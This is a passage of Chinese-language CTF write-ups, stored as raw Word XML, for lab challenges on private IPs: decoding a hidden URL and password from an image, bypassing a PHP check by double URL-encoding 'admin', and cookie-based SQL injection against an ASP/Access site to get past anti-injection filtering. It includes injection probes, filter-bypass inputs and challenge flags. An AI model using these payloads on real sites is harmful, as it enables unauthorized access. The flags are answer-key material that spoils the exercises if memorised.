      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解密得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在源码中还有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到是百度网盘的分享码</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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http://10.2.0.59/23,</w:t>
      </w:r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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，先下载图片</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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winhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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解密得到</w:t>
      </w:r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在源码中还有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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解密</w:t>
      </w:r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可以看到是百度网盘的分享码</w:t>
      </w:r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vo40,</w:t>
      </w:r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得到</w:t>
      </w:r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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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061D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061DA4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&lt;http://10.10.23.105/23/&gt;</w:t>
      </w:r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 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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061D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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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081422" cy="3423349"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="149" name="图片 149" descr="http://192.168.109.235/storage/images/20181207164018Fq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20181207164018Fqx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438" cy="343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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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061D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061D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右键将图片另存为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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172531" cy="4187287"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="150" name="图片 150" descr="http://192.168.109.235/storage/images/20181207164025c5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20181207164025c5T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378" cy="420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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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061D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061D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用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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winhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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打开图片，发现一段诡异代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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690227" cy="3030403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="151" name="图片 151" descr="http://192.168.109.235/storage/images/201812071640315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201812071640315fd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524" cy="305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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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061D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进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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解密（访问网站</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tool.chinaz.com/tools/urlencode.aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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解密），解密完成得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://pan.baidu.com/s/1gdiOb7d</w:t>
      </w:r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 </w:t>
      </w:r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发现是百度网盘。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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166601" cy="3985002"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="152" name="图片 152" descr="http://192.168.109.235/storage/images/20181207164037CX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92.168.109.235/storage/images/20181207164037CXm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482" cy="3994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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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061D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061D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打开连接发现有密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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3215898" cy="2829990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="153" name="图片 153" descr="http://192.168.109.235/storage/images/20181207164043Sp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92.168.109.235/storage/images/20181207164043SpW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505" cy="284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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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查看网页源码，密码的密文在这里，同样是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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加密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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597310" cy="1547794"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="154" name="图片 154" descr="http://192.168.109.235/storage/images/20181207164049r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192.168.109.235/storage/images/20181207164049rDB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099" cy="1562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76" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="0047427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61D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061D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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00061D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同样的方式解密得到密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vo40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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965108" cy="1219617"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="155" name="图片 155" descr="http://192.168.109.235/storage/images/20181207164055Y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192.168.109.235/storage/images/20181207164055YQl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606" cy="1230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76" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16736">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2qrytrnpymbKyQopOs2zPnDSvnOCvWLqQf1j4DSlJa51NV38HG749FcB5nCtnh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00474276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF1CBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整理一下你的发型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276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</w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先查看响应头，找到提示文件，然后通过两次</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码绕过判断，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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http://10.2.0.72/44,</w:t>
      </w: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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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BF1CBD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lastRenderedPageBreak/>
        <w:t>Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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先查看响应头，找到提示文件，然后通过两次</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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编码绕过判断，得到</w:t>
      </w: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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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BF1CB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BF1CB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BF1CB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BF1CBD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&lt;http://10.137.0.20/44/&gt;</w:t>
      </w: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BF1CB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BF1CB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地址以真实获取的为准</w:t>
      </w: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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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432520" cy="3529578"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="156" name="图片 156" descr="http://192.168.109.235/storage/images/201812101506576w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812101506576wc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223" cy="3543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76" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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BF1CB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BF1CB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BF1CB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按</w:t>
      </w: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F12</w:t>
      </w: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打开控制台，点击网络选项，在消息头里发现提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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268023" cy="3086832"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="157" name="图片 157" descr="http://192.168.109.235/storage/images/201812101508173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201812101508173Og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945" cy="311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76" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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BF1CB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BF1CB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BF1CB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看到提示检查文件</w:t>
      </w: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proofErr w:type="spellStart"/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index_hongya.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，输入地址栏</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD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&lt;http://10.137.0.20/44/index_hongya.php&gt;</w:t>
      </w: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 </w:t>
      </w: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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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838061" cy="3066566"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="158" name="图片 158" descr="http://192.168.109.235/storage/images/20181210150923Ed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20181210150923Edu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192" cy="30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76" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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BF1CB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BF1CB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BF1CB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根据代码需要将</w:t>
      </w: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admin</w:t>
      </w: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用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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编码编译一下，</w:t>
      </w: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%61%64%6d%69%6e</w:t>
      </w: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，我们将编译结果传入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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351006" cy="2602268"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="159" name="图片 159" descr="http://192.168.109.235/storage/images/201812101510001u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201812101510001uC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776" cy="2638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76" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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BF1CB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BF1CB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BF1CB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发现并不行，因为网站在访问时候会把传入的值先编译一遍，所以传入的值就变成明文的，而不是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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编码过的了，所以要进行二次编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="0047427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输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD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&lt;http://10.137.0.20/44/index_hongya.php?user=%2561%2564%256d%2569%256e&gt;</w:t>
      </w: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访问，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD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474276" w:rsidRPr="00BF1CBD" w:rsidRDefault="00474276" w:rsidP="00474276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0763250" cy="5838825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="160" name="图片 160" descr="http://192.168.109.235/storage/images/20181210151146lj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20181210151146ljE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0" cy="583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276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index_hongya.php?user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">=admin(admin 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两次加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">admin 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  1  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD">
        <w:t>%61%64%6d%69%6e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1050"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1CBD">
        <w:t>%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16736" w:rsidRDefault="00F16736" w:rsidP="00474276">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1050"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16736">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cd70c87dab94375d1d11f3a5e70c4568</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00F06648" w:rsidRDefault="00F06648" w:rsidP="00474276"/>
    <w:p w:rsidR="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>菜刀的相册</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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F0664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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入题目页面，发现与上面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一样，同样是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$_GET[id]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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/7,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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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F0664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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F06648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进入题目页面，发现与上面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MySQL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一样，同样是通过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\$_GET[id]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传参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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0664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0664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F0664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打开谷歌浏览器输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06648">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;http://10.137.0.8/7&gt;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F0664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F0664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) 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F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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067425" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="168" name="图片 168" descr="http://192.168.109.235/storage/images/20181205102401bp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20181205102401bpG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F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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0664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0664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F0664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构造语句尝试注入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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proofErr w:type="spellStart"/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photo.asp?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=1 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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结果出现了防注入提示，很明显，这里考察的是绕过防注入。首先尝试大小写变换等，结果都无效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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134100" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="167" name="图片 167" descr="http://192.168.109.235/storage/images/201812061351228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201812061351228BE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F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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0664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0664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F0664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条条大路通罗马嘛，于是考虑一下其他的传参方式呢，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COOKIES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传参通常是漏洞发生的地方，谷歌浏览器有一款插件修改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cookie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非常方便</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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7334250" cy="1990725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="166" name="图片 166" descr="http://192.168.109.235/storage/images/20181205102419Jh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92.168.109.235/storage/images/20181205102419JhH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F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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0664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0664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F0664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首先删除</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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中的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id=1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，把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cookie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的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id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值附为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，刷新之后有内容，证明可以注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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06648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4757014" cy="2474455"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="165" name="图片 165" descr="http://192.168.109.235/storage/images/20181206135510CK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92.168.109.235/storage/images/20181206135510CKG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742" cy="2497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F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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0664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0664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F0664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首先判断一下数据库类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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id:1 and exists(select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w:rsidR="00F06648" w:rsidRPr="00F06648" w:rsidRDefault="00F06648" w:rsidP="00F0664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结果返回空结果，所以这里应该是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access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数据库</w:t>
      </w:r>
